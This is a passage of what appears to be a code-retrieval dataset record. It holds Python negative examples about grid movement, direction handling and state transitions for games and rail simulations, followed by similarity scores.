posdiff[1]))\n return newpuz", "def convert_to_transition(env: RailEnv, conv: StateConverter):\r\n\r\n # Transition is a function: [state][action] -> new state\r\n # Transition will be 2D Matrix initially fill with 1 with\r\n # - size of row = number of states\r\n # - size of column = number of action (default = 5)\r\n # If the train in state i and it takes action j then it will get the new state at transition[state=i][action=j]\r\n transition = -np.ones((conv.num_states, 5), dtype=np.int32)\r\n\r\n # Action is valid in a particular state if it leads to a new position.\r\n # There are five actions so size of column will be 5\r\n\r\n # Example: if a train in state i and want to do action j\r\n # then it needs to check if the valid_action[i][j] (if valid_action[i][j]==1 the train can do the action)\r\n valid_action = np.zeros((conv.num_states, 5), dtype=np.int32)\r\n\r\n # Compute the valid_action and transition tables\r\n for row in range(0, env.rail.height):\r\n for col in range(0, env.rail.width):\r\n for dir in range(0, 4):\r\n # For each direction, each col and each row\r\n\r\n # Convert the current position to state\r\n state = conv.position_to_state(row, col, dir)\r\n\r\n # Compute the number of possible transitions.\r\n # First we get the possible transition for the current state.\r\n # The \"get_transitions\" function returns a tuple (0 or 1,0 or 1,0 or 1,0 or 1). 
It shows us which\r\n # direction agent can take\r\n possible_transitions = env.rail.get_transitions(row, col, dir)\r\n # Count the number of direction we can go in current state\r\n num_transitions = np.count_nonzero(possible_transitions)\r\n\r\n if num_transitions > 0:\r\n\r\n # The easy case: stop moving holds current state. (Agent can stop moving at every state\r\n\r\n # Since the action is stop moving, after doing this action\r\n # the new state will be the same as the old state\r\n transition[state][RailEnvActions.STOP_MOVING] = state\r\n # Set to valid action (=1)\r\n valid_action[state][RailEnvActions.STOP_MOVING] = 1\r\n\r\n # Forward is only possible in two cases, there is only 1 option mean there is only one rail, or\r\n # the current direction can be maintained. Stop otherwise.\r\n\r\n # There is only one option for agent\r\n if num_transitions == 1:\r\n # Get the index where possible_transition == 1 , the index implies the new direction after agent\r\n # continue moving forward\r\n new_direction = np.argmax(possible_transitions)\r\n # Calculate new position when apply the only transition we just found\r\n new_position = get_new_position((row, col), new_direction)\r\n # Calculate new state\r\n transition[state][RailEnvActions.MOVE_FORWARD] = conv.position_to_state(new_position[0],\r\n new_position[1],\r\n new_direction)\r\n # Set to valid_action\r\n valid_action[state][RailEnvActions.MOVE_FORWARD] = 1\r\n\r\n # If there are more than one transition and one of the transition has the same direction as the\r\n # agent is facing\r\n elif possible_transitions[dir] == 1:\r\n new_position = get_new_position((row, col), dir)\r\n transition[state][RailEnvActions.MOVE_FORWARD] = conv.position_to_state(new_position[0],\r\n new_position[1], dir)\r\n valid_action[state][RailEnvActions.MOVE_FORWARD] = 1\r\n # If there is no option, the agent will stay\r\n else:\r\n transition[state][RailEnvActions.MOVE_FORWARD] = state\r\n\r\n # Left is only possible if there is a transition out to the left of\r\n # the current direction. Otherwise, we move like we would if going Forward.\r\n new_direction = (dir - 1) % 4\r\n # If there is a transition out to the left of the current direction\r\n if possible_transitions[new_direction]:\r\n new_position = get_new_position((row, col), new_direction)\r\n transition[state][RailEnvActions.MOVE_LEFT] = conv.position_to_state(new_position[0],\r\n new_position[1],\r\n new_direction)\r\n # If moving the left and moving forward are not end up in the same state, set Move_left action\r\n # = 1\r\n valid_action[state][RailEnvActions.MOVE_LEFT] = transition[state][RailEnvActions.MOVE_LEFT] != \\\r\n transition[state][RailEnvActions.MOVE_FORWARD]\r\n else:\r\n transition[state][RailEnvActions.MOVE_LEFT] = transition[state][RailEnvActions.MOVE_FORWARD]\r\n\r\n # Right is only possible if there is a transition out to the Right of\r\n # the current direction. 
Otherwise, we move like we would if going\r\n # Forward.\r\n new_direction = (dir + 1) % 4\r\n if possible_transitions[new_direction]:\r\n new_position = get_new_position((row, col), new_direction)\r\n transition[state][RailEnvActions.MOVE_RIGHT] = conv.position_to_state(new_position[0],\r\n new_position[1],\r\n new_direction)\r\n valid_action[state][RailEnvActions.MOVE_RIGHT] = transition[state][RailEnvActions.MOVE_RIGHT] != \\\r\n transition[state][RailEnvActions.MOVE_FORWARD]\r\n else:\r\n transition[state][RailEnvActions.MOVE_RIGHT] = transition[state][RailEnvActions.MOVE_FORWARD]\r\n\r\n return (transition, valid_action)", "def movement(scale, direction):\n try:\n if direction == left:\n args[0].umvr(-scale, log=False, newline=False)\n elif direction == right:\n args[0].umvr(scale, log=False, newline=False)\n elif direction == up:\n args[1].umvr(scale, log=False, newline=False)\n elif direction == down:\n args[1].umvr(-scale, log=False, newline=False)\n except Exception as exc:\n logger.error('Error in tweak move: %s', exc)\n logger.debug('', exc_info=True)", "def get_next_state(self, state, action):\n pass", "def get_direction_to_left(self, direction):\r\n return direction_to_left[direction]", "def move(exits, direction):\r\n return rooms[exits[direction]]", "def processInput(direction):\n userinput = screen.getch()\n if userinput == curses.KEY_UP:\n direction = 3\n elif userinput == curses.KEY_DOWN:\n direction = 2\n elif userinput == curses.KEY_LEFT:\n direction = 1\n elif userinput == curses.KEY_RIGHT:\n direction = 0\n return direction", "def move(self, direction):\n # Ensure the move is valid\n assert self.is_move_valid(direction), \"Tried to make an invalid move\"\n # Calculate the move location.\n self._current_loc = self._calculate_move_location(direction)\n # Update the path.\n self._path.append(self._current_loc)\n # Increment the move cost.\n self._current_cost = self._current_cost + 1", "def position_to_state(self, row, col, dir):\r\n return dir + 4 * col + 4 * self.width * row", "def try_move(self, direction=None):\n if direction == 'rotate':\n return (self.origin, self.simple_rotate())\n else:\n return (self.get_new_origin(direction=direction), self.positions)", "def move(self, direction):\n pass", "def getDirection(self):\n if 'N' in str(self.trip_update.trip.trip_id):\n direction = 'northbound'\n if 'S' in str(self.trip_update.trip.trip_id):\n direction = 'southbound'\n return direction", "def getDirection(self, direction: str):\n return direction", "def move_length_52(self, move, new_state):\n # Then consider the internal1 move\n new1_state = new_state\n if move in [\"D\", \"P\", \"S\"]:\n for i in [[\"D\", 2, 4, 4, 1, 6, 10, 15, 20, 1,\n 0, 7, 12, 18, 24, 17],\n [\"P\", 9, 21, 14, 14, 16, 17, 18, 19,\n 0, 1, 3, 6, 10, 20, 1],\n [\"S\", 13, 23, 7, 14, 15, 16, 17, 19,\n 10, 0, 3, 7, 12, 24, 17]]:\n new1_state = self.loop54(move, new_state, i)\n\n # Then consider the internal2 move\n internal2 = \\\n [[\"G\", 5, 7, 8, 6, 2, 11, 17, 23, 16, 1, 3, 10, 15, 20, 1],\n [\"H\", 5, 6, 8, 6, 4, 11, 16, 21, 3, 0, 3, 12, 18, 24, 17],\n [\"K\", 5, 16, 22, 15, 9, 11, 12, 13, 8, 1, 3, 6, 15, 20, 1],\n [\"M\", 8, 17, 22, 5, 9, 10, 11, 13, 8, 0, 3, 7, 18, 24, 17],\n [\"Q\", 5, 10, 22, 15, 4, 7, 11, 21, 3, 14, 15, 17, 18, 19, 10],\n [\"R\", 8, 12, 22, 5, 2, 6, 11, 23, 16, 14, 15, 16, 18, 19, 10]]\n if move in [\"G\", \"H\", \"K\", \"M\", \"Q\", \"R\"]:\n for i in internal2:\n new1_state = self.loop55(move, new_state, i)\n\n # Finally consider the move \"L\"\n internal3 = [[\"L\", 9, 
10, 12, 13, 8, 2, 6,\n 17, 23, 16, 4, 7, 16, 21, 3]]\n if move in [\"L\"]:\n for i in internal3:\n new1_state = self.loop56(move, new_state, i)\n return StonehengeState(not self.p1_turn, new1_state.length,\n new1_state.letters, new1_state.claim)", "def create_target_direction(net, net2, dir_type='states'):\n\n assert (net2 is not None)\n # direction between net2 and net\n if dir_type == 'weights':\n w = get_weights(net)\n w2 = get_weights(net2)\n direction = get_diff_weights(w, w2)\n elif dir_type == 'states':\n s = net.state_dict()\n s2 = net2.state_dict()\n direction = get_diff_states(s, s2)\n\n return direction", "def make_move(self, move):\n if type(move) == str:\n move = int(move)\n\n new_state = SubtractSquareState(not self.p1_turn,\n self.current_total - move)\n return new_state", "def move_not_inwards(s):\n if s.op == '~':\n NOT = lambda b: move_not_inwards(~b)\n a = s.args[0]\n if a.op == '~': return move_not_inwards(a.args[0]) # ~~A ==> A\n if a.op =='&': return associate('|', map(NOT, a.args))\n if a.op =='|': return associate('&', map(NOT, a.args))\n return s\n elif is_symbol(s.op) or not s.args:\n return s\n else:\n return Expr(s.op, *map(move_not_inwards, s.args))", "def connect(command):\r\n global CurrentState\r\n global CurrentInput\r\n global RESPONSEOPTIONS\r\n stateNum = \"\"\r\n for ltr in command:\r\n if ltr.isnumeric():\r\n stateNum += ltr\r\n try:\r\n target_state = getState(int(stateNum))\r\n if target_state != None:\r\n if RESPONSEOPTIONS != []:\r\n RESPONSEOPTIONS[0] = target_state\r\n else:\r\n RESPONSEOPTIONS.append(target_state)\r\n else:\r\n print(\"Could not find state\")\r\n except Exception as e:\r\n print(\"<<<Error: Connecting state failed>>>\",e)", "def change_direction(self, direction):\r\n for event in pygame.event.get():\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_ESCAPE:\r\n pygame.quit()\r\n sys.exit()\r\n elif event.key == pygame.K_UP:\r\n if self.direction == [0, 1]:\r\n self.direction == [0, 1]\r\n return self.direction\r\n else:\r\n self.direction = [dx, dy] = [0, -1]\r\n return self.direction\r\n elif event.key == pygame.K_DOWN:\r\n if self.direction == [0, -1]:\r\n self.direction == [0, -1]\r\n return self.direction\r\n else:\r\n self.direction = [dx, dy] = [0, 1]\r\n return self.direction\r\n elif event.key == pygame.K_LEFT:\r\n if self.direction == [1, 0]:\r\n self.direction == [1, 0]\r\n return self.direction\r\n else:\r\n self.direction = [dx, dy] = [-1, 0]\r\n return self.direction\r\n elif event.key == pygame.K_RIGHT:\r\n if self.direction == [-1, 0]:\r\n self.direction == [-1, 0]\r\n return self.direction\r\n else:\r\n self.direction = [dx, dy] = [1, 0]\r\n return self.direction", "def get_move(self, legal):\n move = Directions.STOP\n\n if not self.invert_right_left_controls:\n if ((self.WEST_KEY in self.keys or 'Left' in self.keys) and\n Directions.WEST in legal):\n move = Directions.WEST\n if ((self.EAST_KEY in self.keys or 'Right' in self.keys) and\n Directions.EAST in legal):\n move = Directions.EAST\n else:\n if ((self.WEST_KEY in self.keys or 'Left' in self.keys) and\n Directions.EAST in legal):\n move = Directions.EAST\n if ((self.EAST_KEY in self.keys or 'Right' in self.keys) and\n Directions.WEST in legal):\n move = Directions.WEST\n\n if not self.invert_up_down_controls:\n if ((self.NORTH_KEY in self.keys or 'Up' in self.keys) and\n Directions.NORTH in legal):\n move = Directions.NORTH\n if ((self.SOUTH_KEY in self.keys or 'Down' in self.keys) and\n Directions.SOUTH in legal):\n move = Directions.SOUTH\n 
else:\n if ((self.NORTH_KEY in self.keys or 'Up' in self.keys) and\n Directions.SOUTH in legal):\n move = Directions.SOUTH\n if ((self.SOUTH_KEY in self.keys or 'Down' in self.keys) and\n Directions.NORTH in legal):\n move = Directions.NORTH\n\n return move", "def get_direction(curr_pos, next_pos):\n if curr_pos == next_pos:\n return 'CLEAN'\n\n v_dist = next_pos[0] - curr_pos[0]\n h_dist = next_pos[1] - curr_pos[1]\n\n if h_dist != 0:\n if h_dist < 0:\n return 'LEFT'\n else:\n return 'RIGHT'\n else:\n if v_dist < 0:\n return 'UP'\n else:\n return 'DOWN'", "def shift(self, direction):\n direct, pos = tuple(direction)\n\n board = {'L': self.rows, 'R': self.rows, 'D': self.cols, 'U': self.cols}[direct]\n board[int(pos)].shift(direction=self.direct[direct])", "def convert_instruction(instruction: str) -> Tuple[int, int, int]:\n\t# NOOP\n\tif match := NOOP_REGEX.match(instruction):\n\t\tinstruction_type = 0\n\t# ADD\n\telif match := ADD_REGEX.match(instruction):\n\t\tinstruction_type = 1\n\t# MINUS\n\telif match := MINUS_REGEX.match(instruction):\n\t\tinstruction_type = 2\n\t# GOTO\n\telif match := GOTO_REGEX.match(instruction):\n\t\tinstruction_type = encode_label(match.group(\"TARGET\")) + 2\n\t# No match\n\telse:\n\t\traise ValueError(f\"Unrecognized instruction: {instruction}\")\n\t# get a and c from the label and variable capture groups\n\tlabel = encode_label(match.group(\"LABEL\"))\n\tvariable = encode_var(match.group(\"VAR\")) - 1\n\treturn label, instruction_type, variable", "def calMove(playerLocation, nextLocation):\n move_vector = tuple(np.subtract(nextLocation, playerLocation))\n for MOVE in DIRECTION_TO_CALCULATION:\n if move_vector == DIRECTION_TO_CALCULATION[MOVE]:\n return MOVE\n return \"Not right\"", "def make_move(state: str, section_num: int, move: str) -> str:\n if move == wf.CHECK:\n check_result = wf.check_section(state, section_num)\n if check_result:\n print('The section is correct')\n else:\n print('The section is incorrect')\n else:\n state = wf.change_state(state, section_num, move) \n return state", "def find_opposite(direction:str):\r\n if direction == 'u':\r\n return 'd'\r\n if direction == 'l':\r\n return 'r'\r\n if direction == 'r':\r\n return 'l'\r\n if direction == 'd':\r\n return 'u'", "def take_step(self, location, direction):\n if direction == RIGHT:\n step_location = (location[0]+1,location[1])\n elif direction == DOWN:\n step_location = (location[0], location[1]+1)\n else:\n return location\n\n if step_location[1] < self.rows and step_location[0] < self.columns:\n return step_location if self.is_space_open(step_location) else None", "def move(level, direction):\n levx, levy = len(level[0]), len(level)\n X, Y, state = GetPlayerXY(level)\n if direction == \"up\":\n if level[Y - 1][X] in \".Z\":\n level[Y][X] = {\"S\": \".\", \"Q\": \"Z\"}[state]\n level[Y - 1][X] = {\".\": \"S\", \"Z\": \"Q\"}[level[Y - 1][X]]\n elif Y > 1 and level[Y - 1][X] in \"oW\" and level[Y - 2][X] in \".Z\":\n level[Y][X] = {\"S\": \".\", \"Q\": \"Z\"}[state]\n level[Y - 1][X] = {\"o\": \"S\", \"W\": \"Q\"}[level[Y - 1][X]]\n level[Y - 2][X] = {\".\": \"o\", \"Z\": \"W\"}[level[Y - 2][X]]\n elif direction == \"down\":\n if level[Y + 1][X] in \".Z\":\n level[Y][X] = {\"S\": \".\", \"Q\": \"Z\"}[state]\n level[Y + 1][X] = {\".\": \"S\", \"Z\": \"Q\"}[level[Y + 1][X]]\n elif Y < levy - 2 and level[Y + 1][X] in \"oW\" and level[Y + 2][X] in \".Z\":\n level[Y][X] = {\"S\": \".\", \"Q\": \"Z\"}[state]\n level[Y + 1][X] = {\"o\": \"S\", \"W\": \"Q\"}[level[Y + 1][X]]\n level[Y + 2][X] = 
{\".\": \"o\", \"Z\": \"W\"}[level[Y + 2][X]]\n elif direction == \"left\":\n if level[Y][X - 1] in \".Z\":\n level[Y][X] = {\"S\": \".\", \"Q\": \"Z\"}[state]\n level[Y][X - 1] = {\".\": \"S\", \"Z\": \"Q\"}[level[Y][X - 1]]\n elif X > 1 and level[Y][X - 1] in \"oW\" and level[Y][X - 2] in \".Z\":\n level[Y][X] = {\"S\": \".\", \"Q\": \"Z\"}[state]\n level[Y][X - 1] = {\"o\": \"S\", \"W\": \"Q\"}[level[Y][X - 1]]\n level[Y][X - 2] = {\".\": \"o\", \"Z\": \"W\"}[level[Y][X - 2]]\n elif direction == \"right\":\n if level[Y][X + 1] in \".Z\":\n level[Y][X] = {\"S\": \".\", \"Q\": \"Z\"}[state]\n level[Y][X + 1] = {\".\": \"S\", \"Z\": \"Q\"}[level[Y][X + 1]]\n elif X < levx - 2 and level[Y][X + 1] in \"oW\" and level[Y][X + 2] in \".Z\":\n level[Y][X] = {\"S\": \".\", \"Q\": \"Z\"}[state]\n level[Y][X + 1] = {\"o\": \"S\", \"W\": \"Q\"}[level[Y][X + 1]]\n level[Y][X + 2] = {\".\": \"o\", \"Z\": \"W\"}[level[Y][X + 2]]", "def debuggerstep(self, action):\n\n\n\n #Calculate actual Next State you are supposed to reach via action\n if action == 0:\n nxtState = (self.state[0] - 1, self.state[1])\n elif action == 1:\n nxtState = (self.state[0], self.state[1] - 1)\n elif action == 2:\n nxtState = (self.state[0], self.state[1] + 1) \n elif action == 3: \n nxtState = (self.state[0] + 1, self.state[1])\n\n \n #BUT YOU CAN ONLY REACH THERE WITH 80% PROBABIBILITY\n #Stocasticity Implementation\n correctMove = random.random() \n \n #Check if nextState to reach is valid, Redundant Check (Might have to remove in future iterations)\n if self.isValid(nxtState): \n #If you have a valid next state, you reach there with 80% probability\n if correctMove <= 0.8: \n \n print(\"Ended up in correct state taking action \", end = \"\")\n if (action == 0): \n print(\"Up\")\n elif (action == 1): \n print(\"Left\")\n elif (action == 2): \n print(\"Right\")\n elif(action == 3): \n print(\"Down\")\n self.state = nxtState\n self.isEnd()\n return nxtState, self.giveReward(), self.isTerminal\n \n #Else you didn't end up in right place\n else: \n \n print(\"Ended up in wrong state. 
Had to go \", end = \"\")\n if (action == 0): \n print(\"Up \", end = \"\")\n elif (action == 1): \n print(\"Left \", end = \"\")\n elif (action == 2): \n print(\"Right \", end = \"\")\n elif(action == 3): \n print(\"Down \", end = \"\")\n \n print(\"And end up in \", end = \"\")\n print(nxtState)\n \n print(\"But ended up in: \", end = \"\")\n \n \n #Find remaining states that can be possibly reached: \n altActions =[]\n \n if action == 0:\n altActions.append(1)\n altActions.append(2)\n elif action == 1: \n altActions.append(0)\n altActions.append(3)\n elif action == 2: \n altActions.append(0)\n altActions.append(3)\n else: \n altActions.append(1)\n altActions.append(2)\n \n \n #Pick one random of all possible next states\n altAction = random.choice(altActions)\n #Check if alternate possibility is valid \n if altAction == 0:\n nxtState1 = (self.state[0] - 1, self.state[1])\n elif altAction == 1:\n nxtState1 = (self.state[0], self.state[1] - 1)\n elif altAction == 2:\n nxtState1 = (self.state[0], self.state[1] + 1) \n elif altAction == 3: \n nxtState1 = (self.state[0] + 1, self.state[1])\n \n \n \n #If alternate possibility is valid, update values\n if self.isValid(nxtState1): \n print(nxtState1)\n \n #Update Values \n self.state = nxtState1\n self.isEnd()\n return nxtState1, self.giveReward(), self.isTerminal\n \n #If alternate possibility is not valid, then you stay in place\n else: \n #Stay in place \n print(self.state)\n print(\"Stayed in Place!\")\n self.isEnd()\n return self.state, self.giveReward(), self.isTerminal\n else: \n #Stay in place \n print(self.state)\n print(\"Invalid action picked, Stayed in Place!\")\n self.isEnd()\n return self.state, self.giveReward(), self.isTerminal" ]
[ "0.6593464", "0.62368506", "0.61913526", "0.5976613", "0.57964754", "0.5683937", "0.5672923", "0.5668834", "0.5567708", "0.5457504", "0.5439745", "0.5427397", "0.54177237", "0.53752434", "0.5332933", "0.53058296", "0.53014976", "0.52971196", "0.5290954", "0.5269749", "0.52675956", "0.5265559", "0.5265479", "0.5265479", "0.5238769", "0.5232936", "0.5219115", "0.5213562", "0.5206062", "0.51773226", "0.51667154", "0.51660705", "0.51648617", "0.5164717", "0.5164462", "0.5143994", "0.5136238", "0.513283", "0.51308507", "0.5130536", "0.51293004", "0.51277876", "0.51201063", "0.5119316", "0.5116624", "0.51135033", "0.5113289", "0.5104634", "0.5095401", "0.50948757", "0.5091873", "0.50818753", "0.50750893", "0.5073835", "0.5066038", "0.5062011", "0.5060593", "0.50532776", "0.5052389", "0.5045146", "0.5041361", "0.5041133", "0.5022889", "0.50179344", "0.5016665", "0.50093323", "0.50084305", "0.5007903", "0.5006927", "0.5006424", "0.5000127", "0.49988088", "0.49982882", "0.49936894", "0.4991232", "0.49894702", "0.498925", "0.49887416", "0.4987766", "0.4986463", "0.49801567", "0.49781874", "0.49681035", "0.49645257", "0.4947153", "0.49447432", "0.49396786", "0.49369845", "0.49364364", "0.4934991", "0.4934674", "0.49338838", "0.4932872", "0.49295127", "0.49248737", "0.4924649", "0.49239734", "0.49212995", "0.49094602", "0.490821" ]
0.77884203
0
Returns a new coordinate after moving the rover. Based on the direction, it applies a movement of one grid cell and calculates the new coordinate. It throws an exception if the new coordinate is off the grid or if the new coordinate results in a collision with another rover.
def _coordinate_after_moving(self, direction, coordinate): if direction == 'N': new_coordinate = Coordinate(coordinate.x, coordinate.y + 1) elif direction == 'S': new_coordinate = Coordinate(coordinate.x, coordinate.y - 1) elif direction == 'W': new_coordinate = Coordinate(coordinate.x - 1, coordinate.y) else: new_coordinate = Coordinate(coordinate.x + 1, coordinate.y) if not self._is_coordinate_in_the_grid(new_coordinate): raise RoverException(ExceptionMessages.OFF_GRID) if self._is_coordinate_occupied(new_coordinate): raise RoverException(ExceptionMessages.ROVER_COLLISION) return new_coordinate
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _calculate_move_location(self, direction):\n current_row = self._current_loc.get_row()\n current_column = self._current_loc.get_column()\n\n # Calculate the new location for a left move\n if (direction == \"l\"):\n return Location(current_row, current_column - 1)\n # Calculate the new location for an up move\n elif (direction == \"u\"):\n return Location(current_row - 1, current_column)\n # Calculate the new location for a right move\n elif (direction == \"r\"):\n return Location(current_row, current_column + 1)\n # Calculate the new location for a down move\n elif (direction == \"d\"):\n return Location(current_row + 1, current_column)\n return Location()", "def move(self, direction):\n\n # Check if there are empty tiles available\n for row in self._grid:\n if row.count(0) != 0:\n self._game_over = False\n break\n else:\n self._game_over = True\n\n # If empty tiles are not available, game over\n if self._game_over == True:\n print \"Sorry Game Over, Board Full\"\n print self.__str__()\n return None\n\n # New tiles won't be needed for illegal moves\n new_tiles_needed = False\n\n for tile in self._initial_tiles[direction]:\n old_tiles = self.traverse_grid(tile, OFFSETS[direction], self._steps[direction])\n tiles = merge(old_tiles)\n if old_tiles != tiles:\n # The old row and the new row are different after the merge\n # New tile will be needed\n new_tiles_needed = True\n self.set_grid(tile, OFFSETS[direction], tiles)\n\n if new_tiles_needed == True:\n self.new_tile()", "def _do_move(game, main_grid, wallh_grid, wallv_grid,\n wallfills_grid, move, player, requested_players):\n # Extract destination coordinations.\n x = move[\"x\"]\n y = move[\"y\"]\n\n if move[\"type\"] == \"move\":\n for i in range(len(main_grid)):\n if player in main_grid[i]:\n py = i\n px = main_grid[i].index(player)\n main_grid[y][x] = player\n main_grid[py][px] = 0\n\n if move[\"type\"] == \"wall\" and move[\"direction\"] == \"h\":\n wallh_grid[y][x] = 1\n wallh_grid[y][x+1] = 1\n wallfills_grid[y][x] = 1\n if player == 1:\n game.player1_walls -= 1\n elif player == 2:\n game.player2_walls -= 1\n elif player == 3:\n game.player3_walls -= 1\n elif player == 4:\n game.player4_walls -= 1\n\n if move[\"type\"] == \"wall\" and move[\"direction\"] == \"v\":\n wallv_grid[y][x] = 1\n wallv_grid[y+1][x] = 1\n wallfills_grid[y][x] = 1\n if player == 1:\n game.player1_walls -= 1\n elif player == 2:\n game.player2_walls -= 1\n elif player == 3:\n game.player3_walls -= 1\n elif player == 4:\n game.player4_walls -= 1\n\n if requested_players == \"two\":\n if player == 1:\n game.turn = game.player2\n if player == 2:\n game.turn = game.player1\n if requested_players == \"four\":\n if player == 1:\n game.turn = game.player2\n if player == 2:\n game.turn = game.player3\n if player == 3:\n game.turn = game.player4\n if player == 4:\n game.turn = game.player1\n\n last_status = json.dumps({\"status\": \"playing\", \"turn\": game.turn.username})\n\n # Check to see if the game has been won. 
Apply scores if so.\n if check_win(main_grid, player):\n if requested_players == \"two\":\n players = {1: game.player1, 2: game.player2}\n winner = players[player]\n winner.two_player_wins += 1\n winner.total_score += 1\n winner.save()\n for p in players.values():\n if p == winner:\n continue\n p.two_player_losses += 1\n p.total_score -= 1\n p.save()\n if requested_players == \"four\":\n players = {1: game.player1, 2: game.player2,\n 3: game.player3, 4: game.player4}\n winner = players[player]\n winner.four_player_wins += 1\n winner.total_score += 3\n winner.save()\n for p in players.values():\n if p == winner:\n continue\n p.four_player_losses += 1\n p.total_score -= 1\n p.save()\n last_status = json.dumps({\"winner\": winner.username,\n \"status\": \"%s has won the game!\"\n % winner.username.capitalize()})\n \n # Update database.\n game.last_status = last_status\n game.main_grid = json.dumps(main_grid)\n game.wallh_grid = json.dumps(wallh_grid)\n game.wallv_grid = json.dumps(wallv_grid)\n game.wallfills_grid = json.dumps(wallfills_grid)\n game.save()\n\n return (last_status + \"\\n\" + game.main_grid + \"\\n\" + game.wallh_grid\n + \"\\n\" + game.wallv_grid + \"\\n\" + game.wallfills_grid\n + \"\\n\" + get_walls(game, requested_players))", "def make_move(self, direction):\r\n\t\tif direction == 0:\r\n\t\t\tself.board[self.x][self.y], self.board[self.x-1][self.y] = self.board[self.x-1][self.y], self.board[self.x][self.y]\r\n\t\t\tself.x -= 1\r\n\r\n\t\telif direction == 1:\r\n\t\t\tself.board[self.x][self.y], self.board[self.x][self.y+1] = self.board[self.x][self.y+1], self.board[self.x][self.y]\r\n\t\t\tself.y += 1\r\n\r\n\t\telif direction == 2:\r\n\t\t\tself.board[self.x][self.y], self.board[self.x+1][self.y] = self.board[self.x+1][self.y], self.board[self.x][self.y]\r\n\t\t\tself.x += 1\r\n\r\n\t\telif direction == 3:\r\n\t\t\tself.board[self.x][self.y], self.board[self.x][self.y-1] = self.board[self.x][self.y-1], self.board[self.x][self.y]\r\n\t\t\tself.y -= 1", "def move(self, direction):\n new_grid = []\n # get the indices of specific direction\n new_indices = self._grid_indices[direction]\n for cell in new_indices:\n lst = self.traversed_list(cell, direction)\n merged_list = merge(lst)\n new_grid.append(merged_list)\n \n adjusted_grid = adjust_grid(new_grid,direction)\n if self.is_changed(adjusted_grid):\n self.update_grid(adjusted_grid)\n self.new_tile()", "def move(self, direction):\n original_grid = []\n for row in self._grid:\n original_row = list(row)\n original_grid.append(original_row)\n steps = 0\n if direction == UP or direction == DOWN:\n steps = self._grid_height\n elif direction == LEFT or direction == RIGHT:\n steps = self._grid_width\n to_move = []\n for initial_cell in self._initial_cells[direction]:\n for step in range(steps):\n new_row = initial_cell[0] + step * OFFSETS[direction][0]\n new_column = initial_cell[1] + step * OFFSETS[direction][1]\n to_move.append(self._grid[new_row][new_column])\n to_move = merge(to_move)\n row = initial_cell[0]\n column = initial_cell[1]\n for step in range(steps):\n self._grid[row + OFFSETS[direction][0] * step][column + OFFSETS[direction][1] * step] = to_move[step]\n to_move = []\n if original_grid != self._grid:\n self.new_tile()", "def move(self, direction):\n if direction in (UP, DOWN):\n num_steps = self._grid_height\n elif direction in (LEFT, RIGHT):\n num_steps = self._grid_width\n moved = False\n temp_list = []\n for start_cell in self._move_dir[direction]:\n # step 1: iterate through each line, write results to temp 
list\n for step in range(num_steps):\n row = start_cell[0] + step * OFFSETS[direction][0]\n col = start_cell[1] + step * OFFSETS[direction][1]\n temp_list.append(self._cells[row][col])\n # step 2: merge temp list\n temp_list_snap = temp_list[:]\n temp_list = merge(temp_list)\n print(temp_list_snap, temp_list)\n if temp_list_snap != temp_list:\n moved = True\n # step 3: store merged temp list back on grid\n idx = 0\n for step in range(num_steps):\n row = start_cell[0] + step * OFFSETS[direction][0]\n col = start_cell[1] + step * OFFSETS[direction][1]\n if direction in (UP, DOWN):\n self._cells[row][col] = temp_list[idx]\n idx += 1\n elif direction in (LEFT, RIGHT):\n self._cells[row][col] = temp_list[idx]\n idx += 1\n temp_list = []\n if moved:\n self.new_tile()\n moved = False\n score = sum(map(sum, self._cells))\n print(\"Your score: %s\" % score)\n #return self._cells", "def move(self, direction):\n change_check = False\n for tile in self.dir_dict[direction]:\n if direction == UP or direction == DOWN:\n temp_list = []\n for step in range(self.grid_height):\n temp_list.append(self.grid[tile[0] + step * OFFSETS[direction][0]]\n [tile[1] + step * OFFSETS[direction][1]])\n if not temp_list == merge(temp_list):\n change_check = True\n temp_list = merge(temp_list)\n for step in range(self.grid_height):\n self.grid[tile[0] + step * OFFSETS[direction][0]] \\\n [tile[1] + step * OFFSETS[direction][1]] \\\n = temp_list[step]\n if direction == LEFT or direction == RIGHT:\n temp_list = []\n for step in range(self.grid_width):\n temp_list.append(self.grid[tile[0] + step * OFFSETS[direction][0]]\n [tile[1] + step * OFFSETS[direction][1]])\n if not temp_list == merge(temp_list):\n change_check = True\n temp_list = merge(temp_list)\n for step in range(self.grid_width):\n self.grid[tile[0] + step * OFFSETS[direction][0]] \\\n [tile[1] + step * OFFSETS[direction][1]] \\\n = temp_list[step]\n if change_check == True:\n self.new_tile()", "def getMovement(self):\n # store the robot's current location and set the directional movement to 0,0 so that the robot won't move by default\n currentLocation = (self.me['x'], self.me['y'])\n directionalMovement = (0,0)\n\n # ensure that target location is not none and not equal to the current location\n if self.targetLocation and not currentLocation == self.targetLocation:\n\n # store the direction, directional movement, and the new map location we will trying to move the robot to this round\n direction = self.getDirection(currentLocation, self.targetLocation)\n directionalMovement = self.getDirectionalMovement(currentLocation, direction)\n newLocation = self.getNewLocation(currentLocation, directionalMovement)\n\n # store the current direction for use later\n initialDirection = direction\n\n # by default, the robot is ready to move in the event that the new map location is already passable\n readyToMove = True\n\n # while the new map location is not passable\n while not self.isPassable(newLocation):\n # if unit is a crusader moving diagonally at their fastest pace, set their directional movement to (1,1)\n if self.isCrusader and directionalMovement[0] == 2 and directionalMovement[1] == 2:\n directionalMovement[0] = 1\n directionalMovement[1] = 1\n # or if the unit is traveling faster than 1 block East\n elif directionalMovement[0] > 1:\n # lower the unit's movement East by 1 block\n directionalMovement[0] -= 1\n # or if the unit is traveling faster than 1 block West\n elif directionalMovement[0] < -1:\n # lower the unit's movement West by 1 block\n 
directionalMovement[0] += 1\n # or if the unit is traveling faster than 1 block South\n elif directionalMovement[1] > 1:\n # lower the unit's movement South by 1 block\n directionalMovement[1] -= 1\n # or if the unit is traveling faster than 1 block North\n elif directionalMovement[1] < -1:\n # lower the unit's movement North by 1 block\n directionalMovement[1] += 1\n # else the unit is already moving the shortest distance they can in the current direction\n else:\n # rotate the robots direction clockwise and proceed\n direction = self.getRotatedDirection(direction, 1)\n\n # if we ened up facing the same direction we started in\n if direction == initialDirection:\n # let the code know we're not ready to move\n readyToMove = False\n # break out of the while loop\n break\n\n # overwrite the directional movement with a new one based on the direction we just got\n directionalMovement = self.getDirectionalMovement(currentLocation, direction)\n\n # overwrite the new location with the location we get from the directional movement we just got\n newLocation = self.getNewLocation(currentLocation, directionalMovement)\n\n # if the robot ended up not being ready to move\n if not readyToMove:\n # change the directional movement back to (0,0) so that it 